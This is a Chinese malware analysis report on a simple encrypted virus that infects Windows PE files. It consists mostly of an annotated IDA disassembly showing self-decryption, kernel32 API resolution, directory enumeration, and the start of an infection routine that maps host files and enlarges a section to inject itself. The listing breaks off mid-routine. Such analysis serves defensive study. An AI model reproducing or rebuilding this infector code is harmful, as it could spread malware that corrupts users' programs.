有加密的简单病毒

基本信息

  报告名称:带加密简单病毒 分析                                                 
  作者:                                                           
  报告更新日期: 2012.07.13                                          
  样本发现日期:                                           
  样本类型:                                                   
  样本文件大小/被感染文件变化长度: B01h  
  样本文件MD5 校验值:                            
  样本文件SHA1 校验值:                           
  壳信息:                                                       
  可能受到威胁的系统:
 Microsoft Windows NT 4.0
Microsoft Windows NT 4.0 Terminal Services Edition
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows Server 2003
Microsoft Windows vista
Microsoft Windows 7                                                   
  相关漏洞:                                                   
  已知检测名称:  
简介
针对 PE 文件的病毒

被感染系统及网络症状
程序无法正常启动

文件系统变化

注册表变化

网络症状

详细分析/功能介绍
1 病毒运行后对自身加密，以防止查杀和分析。
2 获取相关 API，搜寻感染目标
3 解密病毒自身，加密被感染文件的第一个节，添加节注入病毒
.text:00401000 ;
.text:00401000 ; +-------------------------------------------------------------------------+
.text:00401000 ; |     This file is generated by The Interactive Disassembler (IDA)        |
.text:00401000 ; |     Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com>        |
.text:00401000 ; | Licensed to: Mach EDV Dienstleistungen, Jan Mach, 1 user, adv, 11/2007  |
.text:00401000 ; +-------------------------------------------------------------------------+
.text:00401000 ;
.text:00401000 ; Input MD5   : E75E98DFB5D445B1D79E52AB522E26A4
.text:00401000
.text:00401000 ; File Name   : C:\带简单加密的病毒\jiamivirus.exe
.text:00401000 ; Format      : Portable executable for 80386 (PE)
.text:00401000 ; Imagebase   : 400000
.text:00401000 ; Section 1. (virtual address 00001000)
.text:00401000 ; Virtual size                  : 00001E2A (   7722.)
.text:00401000 ; Section size in file          : 00002000 (   8192.)
.text:00401000 ; Offset to raw data for section: 00001000
.text:00401000 ; Flags 60000020: Text Executable Readable
.text:00401000 ; Alignment     : default
.text:00401000
.text:00401000                 .686p
.text:00401000                 .mmx
.text:00401000                 .model flat
.text:00401000
.text:00401000 ; ===========================================================================
.text:00401000
.text:00401000 ; Segment type: Pure code
.text:00401000 ; Segment permissions: Read/Execute
.text:00401000 _text           segment para public 'CODE' use32
.text:00401000                 assume cs:_text
.text:00401000                 ;org 401000h
.text:00401000                 assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
.text:00401000                 db 5 dup(0CCh)  ; 0CCh (int3) filler in front of the stub table
.text:00401005 ; ---------------------------------------------------------------------------
.text:00401005 ; Three 5-byte jump stubs to the main routines. Nothing in this listing
.text:00401005 ; references the stubs themselves (the xrefs IDA shows are the stubs'
.text:00401005 ; own jumps), so how they are reached is not visible here.
.text:00401005                 jmp     inject          ; -> infection routine at 004013F2
.text:0040100A ; ---------------------------------------------------------------------------
.text:0040100A                 jmp     sub_40124E      ; -> per-directory file enumerator at 0040124E
.text:0040100F ; ---------------------------------------------------------------------------
.text:0040100F                 jmp     sub_40130A      ; -> sub-directory walker at 0040130A
.text:0040100F ; ---------------------------------------------------------------------------
.text:00401014                 db 1Ch dup(0CCh)  ; filler up to 'start' at 00401030
.text:00401030
.text:00401030 ; =============== S U B R O U T I N E =======================================
.text:00401030
.text:00401030
.text:00401030                 public start
.text:00401030 start           proc near               ; DATA XREF: inject+1B9r
.text:00401030
.text:00401030 ; FUNCTION CHUNK AT .text:00401233 SIZE 0000001B BYTES
.text:00401030
.text:00401030                 call    $+5
.text:00401035
.text:00401035 loc_401035:                             ; DATA XREF: start+6o
.text:00401035                 pop     ebp
.text:00401036                 sub     ebp, offset loc_401035
.text:0040103C                 lea     esi, dword_401062[ebp]
.text:00401042                 lea     edi, dword_401062[ebp]
.text:00401048                 mov     ecx, 0B01h//循环次数
.text:0040104D                 mov     bl, ss:byte_40165F[ebp]
加密病毒本身
.text:00401053
.text:00401053 loc_401053:                             ; CODE XREF: start+2Ej
.text:00401053                 or      ecx, ecx        ; for(i=ecx,i>0;i++)
.text:00401053                                         ; {
.text:00401053                                         ;   al=40165f[i];
.text:00401053                                         ;   al=xor al,bl;
.text:00401053                                         ;   40186f[i]=al;
.text:00401053                                         ; }
.text:00401055                 jnz     short loc_401059
.text:00401057                 jmp     short loc_401060 ;
.text:00401059 ; ---------------------------------------------------------------------------
.text:00401059
.text:00401059 loc_401059:                             ; CODE XREF: start+25j
.text:00401059                 lodsb
.text:0040105A                 xor     al, bl
.text:0040105C                 stosb
.text:0040105D                 dec     ecx
.text:0040105E                 jmp     short loc_401053 ; for(i=ecx,i>0;i++)
.text:0040105E                                         ; {
.text:0040105E                                         ;   al=40165f[i];
.text:0040105E                                         ;   al=xor al,bl;
.text:0040105E                                         ;   40186f[i]=al;
.text:0040105E                                         ; }
.text:00401060 ; ---------------------------------------------------------------------------
.text:00401060
.text:00401060 loc_401060:                             ; CODE XREF: start+27j
.text:00401060                 jmp     short loc_401068 ;
.text:00401060 ; ---------------------------------------------------------------------------
.text:00401062 dword_401062    dd 72616863h            ; DATA XREF: start+Cr
.text:00401062                                         ; start+12r ...
.text:00401066                 dw 656Dh
.text:00401068 ; ---------------------------------------------------------------------------
.text:00401068
.text:00401068 loc_401068:                             ; CODE XREF: start:loc_401060j
.text:00401068                 mov     esi, ss:image_base[ebp]
.text:0040106E                 mov     edi, esi
.text:00401070                 mov     ecx, ss:virtualsize[ebp]
.text:00401076
.text:00401076 loc_401076:                             ; CODE XREF: start+51j
.text:00401076                 or      ecx, ecx
.text:00401078                 jnz     short loc_40107C
.text:0040107A                 jmp     short loc_401083
.text:0040107C ; ---------------------------------------------------------------------------
.text:0040107C
.text:0040107C loc_40107C:                             ; CODE XREF: start+48j
.text:0040107C                 lodsb
.text:0040107D                 xor     al, bl
.text:0040107F                 stosb
.text:00401080                 dec     ecx
.text:00401081                 jmp     short loc_401076
搜索 kernel,搜索api
.text:00401083 ; ---------------------------------------------------------------------------
.text:00401083
.text:00401083 loc_401083:                             ; CODE XREF: start+4Aj
.text:00401083                 mov     ss:byte_40165F[ebp], bl
.text:00401089                 mov     eax, [esp+0]
.text:0040108C                 and     eax, 0FFFFF000h
.text:00401091
.text:00401091 loc_401091:                             ; CODE XREF: start+6Dj
.text:00401091                 cmp     word ptr [eax], 'ZM'
.text:00401096                 jz      short loc_40109F ; 查找成功跳转
.text:00401098                 sub     eax, 1000h      ; 第一种方式查找kernel
.text:0040109D                 jmp     short loc_401091
.text:0040109F ; ---------------------------------------------------------------------------
.text:0040109F
.text:0040109F loc_40109F:                             ; CODE XREF: start+66j
.text:0040109F                 mov     ss:peheader[ebp], eax
.text:004010A5                 lea     esi, byte_40166D[ebp]
.text:004010AB                 call    get_api_process ; 在导出表中搜索需要的api
.text:004010B0                 mov     ss:dword_401679[ebp], eax
.text:004010B6                 mov     eax, ss:peheader[ebp]
.text:004010BC                 lea     esi, byte_40171F[ebp]
.text:004010C2                 call    get_api_process ; 在导出表中搜索需要的api
.text:004010C7                 mov     dword ptr ss:find_firstfile[ebp], eax
.text:004010CD                 mov     eax, ss:peheader[ebp]
.text:004010D3                 lea     esi, byte_4016B4[ebp]
.text:004010D9                 call    get_api_process ; 在导出表中搜索需要的api
.text:004010DE                 mov     ss:setcurrentdirectory[ebp], eax
.text:004010E4                 mov     eax, ss:peheader[ebp]
.text:004010EA                 lea     esi, dword_401731[ebp]
.text:004010F0                 call    get_api_process ; 在导出表中搜索需要的api
.text:004010F5                 mov     ss:getfileatributes[ebp], eax
.text:004010FB                 mov     eax, ss:peheader[ebp]
.text:00401101                 lea     esi, dword_401747[ebp]
.text:00401107                 call    get_api_process ; 在导出表中搜索需要的api
.text:0040110C                 mov     ss:find_nexttfile[ebp], eax
.text:00401112                 mov     eax, ss:peheader[ebp]
.text:00401118                 lea     esi, dword_401758[ebp]
.text:0040111E                 call    get_api_process ; 在导出表中搜索需要的api
.text:00401123                 mov     ss:dword_401762[ebp], eax
.text:00401129                 mov     eax, ss:peheader[ebp]
.text:0040112F                 lea     esi, dword_40167D[ebp]
.text:00401135                 call    get_api_process ; 在导出表中搜索需要的api
.text:0040113A                 mov     ss:dword_401688[ebp], eax
.text:00401140                 mov     eax, ss:peheader[ebp]
.text:00401146                 lea     esi, dword_401766[ebp]
.text:0040114C                 call    get_api_process ; 在导出表中搜索需要的api
.text:00401151                 mov     ss:dword_40176E[ebp], eax
.text:00401157                 mov     eax, ss:peheader[ebp]
.text:0040115D                 lea     esi, dword_40170F[ebp]
.text:00401163                 call    get_api_process ; 在导出表中搜索需要的api
.text:00401168                 mov     ss:getfilesize[ebp], eax
.text:0040116E                 mov     eax, ss:peheader[ebp]
.text:00401174                 lea     esi, aCreatefilemapp[ebp] ; "CreateFileMapping"
.text:0040117A                 call    get_api_process ; 在导出表中搜索需要的api
.text:0040117F                 mov     ss:creatfile_map[ebp], eax
.text:00401185                 mov     eax, ss:peheader[ebp]
.text:0040118B                 lea     esi, dword_4016A2[ebp]
.text:00401191                 call    get_api_process ; 在导出表中搜索需要的api
.text:00401196                 mov     ss:viewoffile[ebp], eax
.text:0040119C                 mov     eax, ss:peheader[ebp]
.text:004011A2                 lea     esi, dword_4016CC[ebp]
.text:004011A8                 call    get_api_process ; 在导出表中搜索需要的api
.text:004011AD                 mov     ss:dword_4016D8[ebp], eax
.text:004011B3                 mov     eax, ss:peheader[ebp]
.text:004011B9                 lea     esi, dword_4016EB[ebp]
.text:004011BF                 call    get_api_process ; 在导出表中搜索需要的api
.text:004011C4                 mov     ss:dword_4016FB[ebp], eax
.text:004011CA                 mov     eax, ss:peheader[ebp]
.text:004011D0                 lea     esi, dword_4016FF[ebp]
.text:004011D6                 call    get_api_process ; 在导出表中搜索需要的api
.text:004011DB                 mov     ss:dword_40170B[ebp], eax
.text:004011E1                 jmp     short loc_401233
.text:004011E1 start           endp
.text:004011E1
.text:004011E3
.text:004011E3 ; =============== S U B R O U T I N E =======================================
.text:004011E3
在导出表中搜索需要的api
.text:004011E3 ;
.text:004011E3
.text:004011E3 get_api_process proc near               ; CODE XREF: start+7Bp
.text:004011E3                                         ; start+92p ...
.text:004011E3 ; Resolve an export by walking the module's export name table.
.text:004011E3 ;   in:  eax = module base (DOS header), esi = NUL-terminated name to find
.text:004011E3 ;   out: eax = virtual address of the matching export
.text:004011E3 ; Clobbers ebx, ecx, edx, edi; esi is restored through the push/pop pairs.
.text:004011E3 ; The compare at loc_401204 stops as soon as the *target* string ends and
.text:004011E3 ; never checks that the export name ends there too, so it is a prefix match.
.text:004011E3 ; NumberOfNames ([ebx+18h]) is never consulted: a name that is absent makes
.text:004011E3 ; the loop at loc_4011F8 read past the end of the name table.
.text:004011E3                 mov     ebx, [eax+3Ch]  ; e_lfanew
.text:004011E6                 add     ebx, eax        ; ebx -> "PE\0\0" signature
.text:004011E8                 add     ebx, 78h        ; ebx -> DataDirectory[0].VirtualAddress (export table, PE32)
.text:004011EB                 mov     ebx, [ebx]      ; export directory RVA
.text:004011ED                 add     ebx, eax        ; ebx -> IMAGE_EXPORT_DIRECTORY
.text:004011EF                 xor     edx, edx        ; edx = name index (becomes 1-based below)
.text:004011F1                 mov     ecx, [ebx+20h]  ; AddressOfNames RVA
.text:004011F4                 add     ecx, eax        ; ecx -> first name RVA entry
.text:004011F6                 push    esi             ; keep target pointer and index across each compare
.text:004011F7                 push    edx
.text:004011F8
.text:004011F8 loc_4011F8:                             ; CODE XREF: get_api_process+27j
.text:004011F8                 pop     edx             ; restore index
.text:004011F9                 pop     esi             ; restore target name pointer
.text:004011FA                 inc     edx             ; index of the name about to be tested
.text:004011FB                 mov     edi, [ecx]      ; RVA of the current export name
.text:004011FD                 add     edi, eax        ; edi -> export name string
.text:004011FF                 add     ecx, 4          ; advance to the next AddressOfNames entry
.text:00401202                 push    esi
.text:00401203                 push    edx
.text:00401204
.text:00401204 loc_401204:                             ; CODE XREF: get_api_process+30j
.text:00401204                 mov     dl, [edi]       ; export name byte
.text:00401206                 mov     dh, [esi]       ; target name byte
.text:00401208                 cmp     dl, dh
.text:0040120A                 jnz     short loc_4011F8 ; mismatch: try the next name
.text:0040120C                 inc     edi
.text:0040120D                 inc     esi
.text:0040120E                 cmp     byte ptr [esi], 0 ; end of target? ([edi] is not checked -> prefix match)
.text:00401211                 jz      short loc_401215
.text:00401213                 jmp     short loc_401204
.text:00401215 ; ---------------------------------------------------------------------------
.text:00401215
.text:00401215 loc_401215:                             ; CODE XREF: get_api_process+2Ej
.text:00401215                 pop     edx             ; 1-based index of the matching name
.text:00401216                 pop     esi
.text:00401217                 dec     edx             ; 0-based index
.text:00401218                 shl     edx, 1          ; * sizeof(WORD)
.text:0040121A                 mov     ecx, [ebx+24h]  ; AddressOfNameOrdinals RVA
.text:0040121D                 add     ecx, eax
.text:0040121F                 add     ecx, edx
.text:00401221                 xor     edx, edx
.text:00401223                 mov     dx, [ecx]       ; ordinal (index into AddressOfFunctions)
.text:00401226                 shl     edx, 2          ; * sizeof(DWORD)
.text:00401229                 mov     ecx, [ebx+1Ch]  ; AddressOfFunctions RVA
.text:0040122C                 add     ecx, eax
.text:0040122E                 add     ecx, edx
.text:00401230                 add     eax, [ecx]      ; eax = base + function RVA
.text:00401232                 retn
.text:00401232 get_api_process endp
.text:00401232
.text:00401233 ; ---------------------------------------------------------------------------
.text:00401233 ; START OF FUNCTION CHUNK FOR start
转换当前位置寻找感染目标
.text:00401233
.text:00401233 loc_401233:                             ; CODE XREF: start+1B1j
.text:00401233 ; Continuation of start after API resolution: change to the directory named
.text:00401233 ; at directroy_path (string not shown here), run the directory walker, then
.text:00401233 ; jump to nullsub_1 (IDA's name for a bare-return function; its body is not in
.text:00401233 ; this listing, so how control returns to the host is not visible).
.text:00401233                 lea     esi, directroy_path[ebp] ; lpPathName
.text:00401239                 push    esi
.text:0040123A                 mov     eax, ss:setcurrentdirectory[ebp]
.text:00401240                 call    eax             ; SetCurrentDirectory(directroy_path)
.text:00401242                 push    ebp             ; ebp is the relocation delta; preserved around the walker
.text:00401243                 call    sub_40130A      ; walk sub-directories; infection happens in sub_40124E -> inject
.text:00401248                 pop     ebp
.text:00401249                 jmp     nullsub_1       ; not in this listing
.text:00401249 ; END OF FUNCTION CHUNK FOR start
.text:0040124E
.text:0040124E ; =============== S U B R O U T I N E =======================================
.text:0040124E
.text:0040124E
.text:0040124E sub_40124E      proc near               ; CODE XREF: .text:0040100Aj
.text:0040124E                                         ; sub_40130A+66p ...
.text:0040124E ; Enumerate the current directory with the pattern at byte_401893 (string not
.text:0040124E ; shown) using the WIN32_FIND_DATA buffer at dword_401A12 (cFileName at +2Ch)
.text:0040124E ; and call inject for every entry that is not a directory.
.text:0040124E ; Returns eax = -1 if FindFirstFile fails; otherwise returns when FindNextFile
.text:0040124E ; yields 0 (eax = 0). The find handle stored in dword_4018A4 is never closed
.text:0040124E ; in this routine (no FindClose call is visible).
.text:0040124E ; Only the first character of a name is inspected ('.' entries are skipped)
.text:0040124E ; and the attribute test is an exact "== 10h", so anything for which
.text:0040124E ; GetFileAttributes returns a value other than exactly FILE_ATTRIBUTE_DIRECTORY
.text:0040124E ; (e.g. a hidden or system directory, or the -1 error value) is handed to
.text:0040124E ; inject as if it were a file.
.text:0040124E                 lea     eax, dword_401A12[ebp] ; lpFindFileData
.text:00401254                 push    eax
.text:00401255                 lea     eax, byte_401893[ebp] ; lpFileName (search pattern)
.text:0040125B                 push    eax
.text:0040125C                 mov     eax, dword ptr ss:find_firstfile[ebp]
.text:00401262                 call    eax             ; FindFirstFile per label
.text:00401264                 mov     ss:dword_4018A4[ebp], eax ; search handle
.text:0040126A                 cmp     eax, 0FFFFFFFFh ; INVALID_HANDLE_VALUE?
.text:0040126D                 jnz     short loc_401279
.text:0040126F                 mov     eax, 0FFFFFFFFh ; return -1
.text:00401274                 jmp     locret_401309
.text:00401279 ; ---------------------------------------------------------------------------
.text:00401279
.text:00401279 loc_401279:                             ; CODE XREF: sub_40124E+1Fj
.text:00401279                 lea     esi, dword_401A12[ebp]
.text:0040127F                 lea     eax, [esi+2Ch]  ; -> cFileName
.text:00401282                 mov     esi, eax
.text:00401284                 lodsb                   ; first character only
.text:00401285                 cmp     al, '.'
.text:00401287                 jnz     short loc_40128B
.text:00401289                 jmp     short loc_4012B2 ; "." / ".." (and any dot-name): skip
.text:0040128B ; ---------------------------------------------------------------------------
.text:0040128B
.text:0040128B loc_40128B:                             ; CODE XREF: sub_40124E+39j
.text:0040128B                 lea     esi, dword_401A12[ebp]
.text:00401291                 lea     eax, [esi+2Ch]  ; -> cFileName
.text:00401294                 push    eax             ; second copy survives the call; popped below
.text:00401295                 push    eax             ; lpFileName
.text:00401296                 mov     eax, ss:getfileatributes[ebp]
.text:0040129C                 call    eax             ; GetFileAttributes per label
.text:0040129E                 cmp     eax, 10h        ; exactly FILE_ATTRIBUTE_DIRECTORY?
.text:004012A1                 jz      short loc_4012B1 ; directory: skip
.text:004012A3                 pop     eax             ; -> cFileName
.text:004012A4                 mov     ss:filename[ebp], eax ; input slot for inject
.text:004012AA                 call    inject          ; infect this entry
.text:004012AF                 jmp     short loc_4012B2
.text:004012B1 ; ---------------------------------------------------------------------------
.text:004012B1
.text:004012B1 loc_4012B1:                             ; CODE XREF: sub_40124E+53j
.text:004012B1                 pop     eax             ; discard the saved pointer
.text:004012B2
.text:004012B2 loc_4012B2:                             ; CODE XREF: sub_40124E+3Bj
.text:004012B2                                         ; sub_40124E+61j ...
.text:004012B2                 lea     esi, dword_401A12[ebp] ; lpFindFileData
.text:004012B8                 push    esi
.text:004012B9                 mov     esi, ss:dword_4018A4[ebp] ; hFindFile
.text:004012BF                 push    esi
.text:004012C0                 mov     eax, ss:find_nexttfile[ebp]
.text:004012C6                 call    eax             ; FindNextFile per label
.text:004012C8                 or      eax, eax
.text:004012CA                 jnz     short loc_4012CE
.text:004012CC                 jmp     short locret_401309 ; no more entries (eax = 0); handle left open
.text:004012CE ; ---------------------------------------------------------------------------
.text:004012CE
.text:004012CE loc_4012CE:                             ; CODE XREF: sub_40124E+7Cj
.text:004012CE                 lea     esi, dword_401A12[ebp]
.text:004012D4                 lea     eax, [esi+2Ch]  ; -> cFileName
.text:004012D7                 mov     esi, eax
.text:004012D9                 lodsb
.text:004012DA                 cmp     al, 2Eh         ; '.' -- same test as loc_401279
.text:004012DC                 jnz     short loc_4012E0
.text:004012DE                 jmp     short loc_4012B2
.text:004012E0 ; ---------------------------------------------------------------------------
.text:004012E0
.text:004012E0 loc_4012E0:                             ; CODE XREF: sub_40124E+8Ej
.text:004012E0                 lea     esi, dword_401A12[ebp]
.text:004012E6                 lea     eax, [esi+2Ch]  ; -> cFileName
.text:004012E9                 push    eax             ; saved copy
.text:004012EA                 push    eax             ; lpFileName
.text:004012EB                 mov     eax, ss:getfileatributes[ebp]
.text:004012F1                 call    eax             ; GetFileAttributes per label
.text:004012F3                 cmp     eax, 10h        ; exactly FILE_ATTRIBUTE_DIRECTORY?
.text:004012F6                 jz      short loc_401306
.text:004012F8                 pop     eax
.text:004012F9                 mov     ss:filename[ebp], eax ; input slot for inject
.text:004012FF                 call    inject          ; entry accepted: infect it
.text:00401304                 jmp     short loc_401307
.text:00401306 ; ---------------------------------------------------------------------------
.text:00401306
.text:00401306 loc_401306:                             ; CODE XREF: sub_40124E+A8j
.text:00401306                 pop     eax             ; discard the saved pointer
.text:00401307
.text:00401307 loc_401307:                             ; CODE XREF: sub_40124E+B6j
.text:00401307                 jmp     short loc_4012B2 ; next entry
.text:00401309 ; ---------------------------------------------------------------------------
.text:00401309
.text:00401309 locret_401309:                          ; CODE XREF: sub_40124E+26j
.text:00401309                                         ; sub_40124E+7Ej
.text:00401309                 retn
.text:00401309 sub_40124E      endp
.text:00401309
.text:0040130A
.text:0040130A ; =============== S U B R O U T I N E =======================================
.text:0040130A
.text:0040130A
.text:0040130A sub_40130A      proc near               ; CODE XREF: .text:0040100Fj
.text:0040130A                                         ; start+213p
.text:0040130A ; Enumerate the current directory with the pattern at word_40188F (string not
.text:0040130A ; shown; the author's note says exe files) into file_data_stru (cFileName at
.text:0040130A ; +2Ch). For every entry whose attributes are exactly 10h (directory): change
.text:0040130A ; into it, run sub_40124E there, then SetCurrentDirectory(dword_401899) to go
.text:0040130A ; back (author's note: parent directory; string not shown). Entries that are
.text:0040130A ; not directories are ignored here -- this routine never calls inject, and
.text:0040130A ; sub_40124E never calls back into it, so the walk is exactly one level deep.
.text:0040130A ; Returns eax = -1 if FindFirstFile fails, else 0 when FindNextFile ends.
.text:0040130A ; The handle in file_handle is not closed here (no FindClose call visible).
.text:0040130A ; NOTE(review): inject stores a file handle at dword_401899+3 (00401413), i.e.
.text:0040130A ; 3 bytes into the string passed to SetCurrentDirectory below -- confirm the
.text:0040130A ; data layout before relying on either label.
.text:0040130A                 lea     esi, file_data_stru[ebp] ; lpFindFileData
.text:00401310                 push    esi
.text:00401311                 lea     esi, word_40188F[ebp] ; lpFileName (search pattern)
.text:00401317                 push    esi
.text:00401318                 mov     eax, dword ptr ss:find_firstfile[ebp]
.text:0040131E                 call    eax             ; FindFirstFile per label
.text:00401320                 mov     ss:file_handle[ebp], eax ; search handle
.text:00401326                 cmp     eax, 0FFFFFFFFh ; INVALID_HANDLE_VALUE?
.text:00401329                 jnz     short loc_401335
.text:0040132B                 mov     eax, 0FFFFFFFFh ; return -1
.text:00401330                 jmp     locret_4013F1
.text:00401335 ; ---------------------------------------------------------------------------
.text:00401335
.text:00401335 loc_401335:                             ; CODE XREF: sub_40130A+1Fj
.text:00401335                 lea     esi, file_data_stru[ebp]
.text:0040133B                 lea     eax, [esi+2Ch]  ; -> cFileName
.text:0040133E                 mov     esi, eax
.text:00401340                 lodsb                   ; first character only
.text:00401341                 cmp     al, '.'
.text:00401343                 jnz     short loc_401347
.text:00401345                 jmp     short loc_401384 ; dot-name: skip
.text:00401347 ; ---------------------------------------------------------------------------
.text:00401347
.text:00401347 loc_401347:                             ; CODE XREF: sub_40130A+39j
.text:00401347                 lea     esi, file_data_stru[ebp]
.text:0040134D                 lea     eax, [esi+2Ch]  ; -> cFileName
.text:00401350                 push    eax             ; lpFileName
.text:00401351                 mov     eax, ss:getfileatributes[ebp] ; GetFileAttributes per label
.text:00401357                 call    eax
.text:00401359                 cmp     eax, 10h        ; exactly FILE_ATTRIBUTE_DIRECTORY?
.text:0040135C                 jnz     short loc_401384 ; not a plain directory: skip
.text:0040135E                 lea     esi, file_data_stru[ebp] ; directory
.text:00401364                 lea     eax, [esi+2Ch]  ; -> cFileName
.text:00401367                 push    eax
.text:00401368                 mov     eax, ss:setcurrentdirectory[ebp]
.text:0040136E                 call    eax             ; SetCurrentDirectory(cFileName)
.text:00401370                 call    sub_40124E      ; infect files inside that directory
.text:00401375                 lea     eax, dword_401899[ebp] ; path string (not shown; author: parent directory)
.text:0040137B                 push    eax
.text:0040137C                 mov     eax, ss:setcurrentdirectory[ebp]
.text:00401382                 call    eax             ; SetCurrentDirectory(dword_401899)
.text:00401384
.text:00401384 loc_401384:                             ; CODE XREF: sub_40130A+3Bj
.text:00401384                                         ; sub_40130A+52j ...
.text:00401384                 lea     esi, file_data_stru[ebp] ; lpFindFileData
.text:0040138A                 push    esi
.text:0040138B                 mov     eax, ss:file_handle[ebp] ; hFindFile
.text:00401391                 push    eax
.text:00401392                 mov     eax, ss:find_nexttfile[ebp]
.text:00401398                 call    eax             ; FindNextFile per label
.text:0040139A                 or      eax, eax
.text:0040139C                 jnz     short loc_4013A0
.text:0040139E                 jmp     short locret_4013F1 ; no more entries (eax = 0); handle left open
.text:004013A0 ; ---------------------------------------------------------------------------
.text:004013A0
.text:004013A0 loc_4013A0:                             ; CODE XREF: sub_40130A+92j
.text:004013A0                 lea     esi, file_data_stru[ebp]
.text:004013A6                 lea     eax, [esi+2Ch]  ; -> cFileName
.text:004013A9                 mov     esi, eax
.text:004013AB                 lodsb
.text:004013AC                 cmp     al, '.'
.text:004013AE                 jnz     short loc_4013B2
.text:004013B0                 jmp     short loc_401384 ; dot-name: skip
.text:004013B2 ; ---------------------------------------------------------------------------
.text:004013B2
.text:004013B2 loc_4013B2:                             ; CODE XREF: sub_40130A+A4j
.text:004013B2                 lea     esi, file_data_stru[ebp]
.text:004013B8                 lea     eax, [esi+2Ch]  ; -> cFileName
.text:004013BB                 push    eax             ; lpFileName
.text:004013BC                 mov     eax, ss:getfileatributes[ebp]
.text:004013C2                 call    eax             ; GetFileAttributes per label
.text:004013C4                 cmp     eax, 10h        ; exactly FILE_ATTRIBUTE_DIRECTORY?
.text:004013C7                 jnz     short loc_4013EF ; not a plain directory: skip
.text:004013C9                 lea     esi, file_data_stru[ebp]
.text:004013CF                 lea     eax, [esi+2Ch]  ; -> cFileName
.text:004013D2                 push    eax
.text:004013D3                 mov     eax, ss:setcurrentdirectory[ebp]
.text:004013D9                 call    eax             ; SetCurrentDirectory(cFileName)
.text:004013DB                 call    sub_40124E      ; infect files inside that directory
.text:004013E0                 lea     eax, dword_401899[ebp] ; path string (not shown; author: parent directory)
.text:004013E6                 push    eax
.text:004013E7                 mov     eax, ss:setcurrentdirectory[ebp]
.text:004013ED                 call    eax             ; SetCurrentDirectory(dword_401899)
.text:004013EF
.text:004013EF loc_4013EF:                             ; CODE XREF: sub_40130A+BDj
.text:004013EF                 jmp     short loc_401384 ; next entry
.text:004013F1 ; ---------------------------------------------------------------------------
.text:004013F1
.text:004013F1 locret_4013F1:                          ; CODE XREF: sub_40130A+26j
.text:004013F1                                         ; sub_40130A+94j
.text:004013F1                 retn
.text:004013F1 sub_40130A      endp
.text:004013F1
.text:004013F2
.text:004013F2 ; =============== S U B R O U T I N E =======================================
.text:004013F2
感染主体
.text:004013F2
.text:004013F2 inject          proc near               ; CODE XREF: .text:00401005j
.text:004013F2                                         ; sub_40124E+5Cp ...
.text:004013F2                 push    0
.text:004013F4                 push    80h
.text:004013F9                 push    4
.text:004013FB                 push    0
.text:004013FD                 push    3
.text:004013FF                 push    0C0000000h
.text:00401404                 mov     eax, ss:filename[ebp]
.text:0040140A                 push    eax
.text:0040140B                 mov     eax, ss:dword_401688[ebp]
.text:00401411                 call    eax
.text:00401413                 mov     ss:(dword_401899+3)[ebp], eax
.text:00401419                 push    0
.text:0040141B                 push    eax
.text:0040141C                 mov     eax, ss:getfilesize[ebp]
.text:00401422                 call    eax
.text:00401424                 add     eax, 0B33h
.text:00401429                 add     eax, 1000h
.text:0040142E                 mov     ss:dword_401B5F[ebp], eax
.text:00401434                 push    0
.text:00401436                 mov     eax, ss:dword_401B5F[ebp]
.text:0040143C                 push    eax
.text:0040143D                 push    0
.text:0040143F                 push    4
.text:00401441                 push    0
.text:00401443                 mov     eax, ss:(dword_401899+3)[ebp]
.text:00401449                 push    eax
.text:0040144A                 mov     eax, ss:creatfile_map[ebp]
.text:00401450                 call    eax
.text:00401452                 mov     ss:dword_4018A8[ebp], eax ; 返回文件映射对象的句柄
.text:00401458                 push    ss:dword_401B5F[ebp]
.text:0040145E                 push    0
.text:00401460                 push    0
.text:00401462                 push    2
.text:00401464                 mov     eax, ss:dword_4018A8[ebp]
.text:0040146A                 push    eax
.text:0040146B                 mov     eax, ss:viewoffile[ebp]
.text:00401471                 call    eax
.text:00401473                 mov     ss:map_base[ebp], eax
.text:00401479                 mov     edi, eax
.text:0040147B                 xor     eax, eax
.text:0040147D                 mov     ax, [edi]
.text:00401480                 add     edi, [edi+3Ch]
.text:00401483                 add     edi, 4
.text:00401486                 xor     ecx, ecx
.text:00401488                 mov     cx, [edi+2]
.text:0040148C                 mov     ss:num_of_section[ebp], ecx
.text:00401492                 add     edi, 14h
.text:00401495                 mov     ss:option_header[ebp], edi
.text:0040149B                 mov     eax, [edi+1Ch]
.text:0040149E                 mov     ss:image_base[ebp], eax
.text:004014A4                 add     eax, [edi+10h]
.text:004014A7                 mov     ss:entry_add[ebp], eax
.text:004014AD                 mov     eax, [edi+24h]
.text:004014B0                 mov     ss:filealign[ebp], eax
.text:004014B6                 add     edi, 0E0h
.text:004014BC                 xor     esi, esi
.text:004014BE
.text:004014BE loc_4014BE:                             ; CODE XREF: inject+112j
.text:004014BE                 or      ecx, ecx
.text:004014C0                 jnz     short loc_4014C4 ; 来到第一个节
.text:004014C2                 jmp     short loc_401506 ; 来到最后一个节
.text:004014C4 ; ---------------------------------------------------------------------------
.text:004014C4
.text:004014C4 loc_4014C4:                             ; CODE XREF: inject+CEj
.text:004014C4                 or      esi, esi        ; 来到第一个节
.text:004014C6                 jnz     short loc_4014F6
.text:004014C8                 mov     eax, [edi+14h]
.text:004014CB                 mov     ss:point_to_rawdata[ebp], eax
.text:004014D1                 mov     eax, [edi+0Ch]
.text:004014D4                 add     ss:image_base[ebp], eax
.text:004014DA                 mov     eax, [edi+8]
.text:004014DD                 mov     ss:virtualsize[ebp], eax
.text:004014E3                 mov     al, [edi]
.text:004014E5                 mov     ss:sectionname[ebp], al
.text:004014EB                 mov     eax, [edi+24h]
.text:004014EE                 or      eax, 0A0000020h
.text:004014F3                 mov     [edi+24h], eax  ; 节属性异或对第一个节进行加密
.text:004014F6
.text:004014F6 loc_4014F6:                             ; CODE XREF: inject+D4j
.text:004014F6                 cmp     [edi+14h], esi
.text:004014F9                 jbe     short loc_401500
.text:004014FB                 mov     esi, [edi+14h]
.text:004014FE                 mov     eax, edi
.text:00401500
.text:00401500 loc_401500:                             ; CODE XREF: inject+107j
.text:00401500                 add     edi, 28h
.text:00401503                 dec     ecx
.text:00401504                 jmp     short loc_4014BE
.text:00401506 ; ---------------------------------------------------------------------------
.text:00401506
.text:00401506 loc_401506:                             ; CODE XREF: inject+D0j
.text:00401506                 mov     edi, eax        ; 来到最后一个节
增加节注入病毒
.text:00401508                 mov     ebx, [edi+8]
.text:0040150B                 add     ebx, 0B33h
.text:00401511                 add     ebx, 7
.text:00401514                 mov     [edi+8], ebx    ; 扩大virtualsize
